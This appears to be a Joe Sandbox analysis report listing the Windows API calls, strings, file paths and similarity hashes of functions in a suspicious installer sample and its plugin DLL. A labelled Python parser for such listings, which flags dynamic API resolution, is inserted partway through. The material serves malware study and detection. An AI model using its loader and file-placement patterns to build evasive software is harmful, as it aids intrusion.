                                                                                        • Opcode Fuzzy Hash: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                                                                        • Instruction Fuzzy Hash: E9A16FB1900219ABDB11EFA5CD41AAFB7B8EF85315F10843BF601B62D1D77C8A418F69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 6FE91215: GlobalAlloc.KERNELBASE(?,6FE91233,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE9121D
                                                                                        • GlobalAlloc.KERNEL32(?,000014A4), ref: 6FE91BC4
                                                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 6FE91C0C
                                                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 6FE91C16
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE91C29
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE91D09
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE91D0E
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE91D13
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE91EFA
                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 6FE92098
                                                                                        • GetModuleHandleA.KERNEL32(00000008), ref: 6FE92114
                                                                                        • LoadLibraryA.KERNEL32(00000008), ref: 6FE92125
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6FE9217E
                                                                                        • lstrlenA.KERNEL32(00000408), ref: 6FE92198
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 245916457-0
                                                                                        • Opcode ID: bb8e574eb09801df88e212c2df7b30e0db8830663a75991878a180670a235e01
                                                                                        • Instruction ID: e3192483dd78b351b21961bd99a87f096a64552915032e5a32ee6d69093c402f
                                                                                        • Opcode Fuzzy Hash: bb8e574eb09801df88e212c2df7b30e0db8830663a75991878a180670a235e01
                                                                                        • Instruction Fuzzy Hash: D2229B71944249DEDB14CFF889807EDBFF9BF06319F30462ED1A5A6280D7786982CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
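
The function listings in this report share one plain-text shape: an APIs section of `Name.MODULE(args), ref: ADDR` bullets (subcall lines carry a `Part of subcall function XXXX:` prefix), an optional Strings section with `, xrefs: ADDR` suffixes, a Memory Dump Source line whose `Offset:` gives the image base, and a Similarity section with the API String ID. The Python below is an added example and is not part of the Joe Sandbox report or its tooling. It parses that shape from a constructed sample assembled from two blocks on this page, groups functions by image base, pulls out file-system paths, and flags the GetModuleHandleA / LoadLibraryA plus GetProcAddress combination that appears in the 6FE90000 module. The section names it keys on and the flagging rule are assumptions drawn from this excerpt, not a documented Joe Sandbox format.

```python
"""Parse Joe Sandbox function-listing text into API and string records."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two function blocks in the shape of the listing on
# this page, with indentation and the "Associated:" dump lines trimmed.
SAMPLE = r"""APIs
  • Part of subcall function 6FE91215: GlobalAlloc.KERNELBASE(?,6FE91233,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE9121D
• GlobalAlloc.KERNEL32(?,000014A4), ref: 6FE91BC4
• lstrcpyA.KERNEL32(00000008,?), ref: 6FE91C0C
• GetModuleHandleA.KERNEL32(00000008), ref: 6FE92114
• LoadLibraryA.KERNEL32(00000008), ref: 6FE92125
• GetProcAddress.KERNEL32(?,?), ref: 6FE9217E
• lstrlenA.KERNEL32(00000408), ref: 6FE92198
Memory Dump Source
• Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
Similarity
• API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
• String ID:
• API String ID: 245916457-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(00407410,?,?,00407400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 004021BA
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402269
Strings
• C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 004021FA
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• API String ID: 123533781-720141496
Uniqueness

Uniqueness Score: -1.00%
"""

# Section headers as they appear in the listing (assumed from this excerpt).
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}

API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s+(?P<value>.*), xrefs:\s*(?P<ref>[0-9A-Fa-f]+)$")
BASE_RE = re.compile(r"^•\s+Source File:.*?Offset:\s*(?P<base>[0-9A-Fa-f]+)")
PATH_RE = re.compile(r"^[A-Za-z]:\\")

# Import-resolution APIs; paired with GetProcAddress they indicate
# run-time API lookup (assumed rule, not a Joe Sandbox signature).
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    caller: str | None = None  # set for "Part of subcall function" lines


@dataclass
class Block:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)
    base: str = ""
    api_string_id: str = ""


def parse_blocks(text: str) -> list[Block]:
    """Split listing text into per-function blocks; a block starts at 'APIs'."""
    blocks: list[Block] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()  # report indentation varies; subcall lines are indented further
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                blocks.append(Block())
            continue
        if not blocks:
            continue  # tail of a block whose 'APIs' header lies outside the excerpt
        cur = blocks[-1]
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append((m["value"], m["ref"]))
        elif section == "Memory Dump Source" and (m := BASE_RE.match(line)):
            cur.base = m["base"]
        elif section == "Similarity" and line.startswith("• API String ID:"):
            cur.api_string_id = line.split(":", 1)[1].strip()
    return blocks


def is_dynamic_resolution(block: Block) -> bool:
    """True when the function both locates a module and resolves an export by name."""
    names = {a.name for a in block.apis}
    return "GetProcAddress" in names and bool(names & LOADERS)


def file_paths(blocks: list[Block]) -> list[str]:
    """Unique drive-letter paths referenced from any function's Strings section."""
    seen: list[str] = []
    for b in blocks:
        for value, _ref in b.strings:
            if PATH_RE.match(value) and value not in seen:
                seen.append(value)
    return seen


def functions_by_base(blocks: list[Block]) -> dict[str, int]:
    """Count functions per mapped image base (e.g. main module vs. plugin DLL)."""
    counts: dict[str, int] = {}
    for b in blocks:
        counts[b.base] = counts.get(b.base, 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for i, b in enumerate(parsed):
        flag = "dynamic API resolution" if is_dynamic_resolution(b) else "-"
        print(f"function {i}: base {b.base}, {len(b.apis)} API refs, {flag}")
    print("paths:", file_paths(parsed))
```

Run against the full exported listing rather than the sample, the base grouping separates the 00400000 installer stub from the 6FE90000 plugin module, and the path list collects the Start Menu\Koalitionens locations that appear across several blocks on this page.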

                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00407410,?,?,00407400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 004021BA
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402269
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 004021FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
                                                                                        • API String ID: 123533781-720141496
                                                                                        • Opcode ID: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
                                                                                        • Instruction ID: 364dec1ee03e4b34996bd20462589a1769652030a90c2beac7f749610b7a86d9
                                                                                        • Opcode Fuzzy Hash: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
                                                                                        • Instruction Fuzzy Hash: 30511871E00209AFCB00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
                                                                                        • Instruction ID: 2655497eb84a062ae037f6c25fa5e5de2408fe63ae01e39025771dd9bbe68540
                                                                                        • Opcode Fuzzy Hash: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
                                                                                        • Instruction Fuzzy Hash: 3BF0A0B2644101AAD701EBB49A49AEEB768EB11324F60417BE241F21C1D2BC89459B6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404A84
                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404A91
                                                                                        • GlobalAlloc.KERNEL32(?,?), ref: 00404AE0
                                                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404AF7
                                                                                        • SetWindowLongA.USER32(?,?,00405075), ref: 00404B11
                                                                                        • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404B23
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B37
                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404B4D
                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B59
                                                                                        • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404B69
                                                                                        • DeleteObject.GDI32(00000110), ref: 00404B6E
                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B99
                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BA5
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C3F
                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C6F
                                                                                          • Part of subcall function 0040409D: SendMessageA.USER32(?,?,?,00403ECD), ref: 004040AB
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C83
                                                                                        • GetWindowLongA.USER32(?,?), ref: 00404CB1
                                                                                        • SetWindowLongA.USER32(?,?,00000000), ref: 00404CBF
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404CCF
                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DCA
                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E2F
                                                                                        • SendMessageA.USER32(?,?,00000000,00000000), ref: 00404E44
                                                                                        • SendMessageA.USER32(?,00000420,00000000,?), ref: 00404E68
                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E88
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404E9D
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00404EAD
                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F26
                                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404FCF
                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FDE
                                                                                        • InvalidateRect.USER32(?,00000000,?), ref: 00404FFE
                                                                                        • ShowWindow.USER32(?,00000000), ref: 0040504C
                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405057
                                                                                        • ShowWindow.USER32(00000000), ref: 0040505E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $M$N
                                                                                        • API String ID: 2564846305-813528018
                                                                                        • Opcode ID: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                                                                        • Instruction ID: 966653e8360bab3e2fc21879108ab338c3bc3285e0cd99f232f5bc98bb3d6c0f
                                                                                        • Opcode Fuzzy Hash: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                                                                        • Instruction Fuzzy Hash: 86025CB0900209AFDB10DF64DC45AAE7BB9FB84314F10813AFA15BA2E0D7799E41DF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 0040425E
                                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404272
                                                                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404290
                                                                                        • GetSysColor.USER32(?), ref: 004042A1
                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042B0
                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042BF
                                                                                        • lstrlenA.KERNEL32(?), ref: 004042C2
                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042D1
                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042E6
                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404348
                                                                                        • SendMessageA.USER32(00000000), ref: 0040434B
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404376
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043B6
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004043C5
                                                                                        • SetCursor.USER32(00000000), ref: 004043CE
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004043E4
                                                                                        • SetCursor.USER32(00000000), ref: 004043E7
                                                                                        • SendMessageA.USER32(00000111,?,00000000), ref: 00404413
                                                                                        • SendMessageA.USER32(?,00000000,00000000), ref: 00404427
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                        • String ID: Call$N
                                                                                        • API String ID: 3103080414-3438112850
                                                                                        • Opcode ID: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                                                                        • Instruction ID: a86fe1b261e308fa50e110e5a31abfd90c360c5de8850f7aae14d0f145b03158
                                                                                        • Opcode Fuzzy Hash: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                                                                        • Instruction Fuzzy Hash: 1561A0B1A00209BBEB109F61DD45F6A7B69FB84705F008036FB01BA2D1C7B8A951CB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                        • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F
                                                                                        • API String ID: 941294808-1304234792
                                                                                        • Opcode ID: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                                                                        • Instruction ID: e0713781b635691343a74aeb4589e3ea90c77733c460a74728c978b7faf409cc
                                                                                        • Opcode Fuzzy Hash: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                                                                        • Instruction Fuzzy Hash: A7419C71804249AFCF058FA4CD459BFBFB9FF44310F00812AF561AA2A0C738AA50DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405DDA,?,?), ref: 00405C7A
                                                                                        • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405C83
                                                                                          • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                                                                          • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                                                                        • GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405CA0
                                                                                        • wsprintfA.USER32 ref: 00405CBE
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,?,00421E98,?,?,?,?,?), ref: 00405CF9
                                                                                        • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405D08
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D40
                                                                                        • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D96
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405DA7
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DAE
                                                                                          • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00405B77
                                                                                          • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                        • String ID: %s=%s$[Rename]
                                                                                        • API String ID: 2171350718-1727408572
                                                                                        • Opcode ID: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                                                                        • Instruction ID: 6ce2b9c5035192946699426d8eaee961ce023100f281e1c8236941499ee81097
                                                                                        • Opcode Fuzzy Hash: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                                                                        • Instruction Fuzzy Hash: 19311331605B19ABD6207B659C4CFAB3A6CDF45714F14003BFA01FA2D2E67CA8018EBD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\jU0hAXFL0k.exe",76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 0040629C
                                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004062A9
                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\jU0hAXFL0k.exe",76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 004062AE
                                                                                        • CharPrevA.USER32(?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 004062BE
                                                                                        Strings
                                                                                        • *?|<>/":, xrefs: 0040628C
                                                                                        • "C:\Users\user\Desktop\jU0hAXFL0k.exe", xrefs: 00406280
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406245
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
